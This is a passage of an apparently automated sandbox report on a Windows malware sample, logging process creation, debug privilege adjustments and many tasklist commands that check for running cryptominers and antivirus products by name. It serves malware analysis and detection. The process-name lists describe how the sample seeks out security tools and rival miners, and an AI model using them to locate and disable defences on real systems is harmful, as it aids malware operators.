Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 483Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeSystem information queried: CurrentTimeZoneInformationJump to behavior
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: AI7f43Z7AC.exe, 00000001.00000002.3386979251.00000262DA465000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllmm@
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq ksoftriqd.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq network0.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddi].exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddi.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddk.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sysrv.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq c3pool.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddk.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq dbused.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddi.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kdevtmpfsi.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kinsing.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq gitlabw.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq monero.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddw.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq ARestore.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq asOELnch.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq buVss.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq cltLMH.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq cltRT.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq coInst.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq coNatHst.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq CpySnpt.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq EFAInst64.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq elaminst.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq FLDgHost.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq InstCA.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq MCUI32.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq Navw32.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq ncolow.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq NortonSecurity.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddk.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nsWscSvc.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nuPerfScan.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq RuleUp.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq SEFInst.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq Sevntx64.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq gitlabw.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddw.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq FLDgHost.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddi].exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq buVss.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq cltRT.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq MCUI32.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddi].exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddi.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kdevtmpfsi.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq cltRT.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq network0.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddi].exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq kthreaddi.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq monero.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq RuleUp.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq cltRT.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq NortonSecurity.exe"Jump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: unknown unknownJump to behavior
Source: C:\Users\user\Desktop\AI7f43Z7AC.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq Sevntx64.exe"Jump to behavior
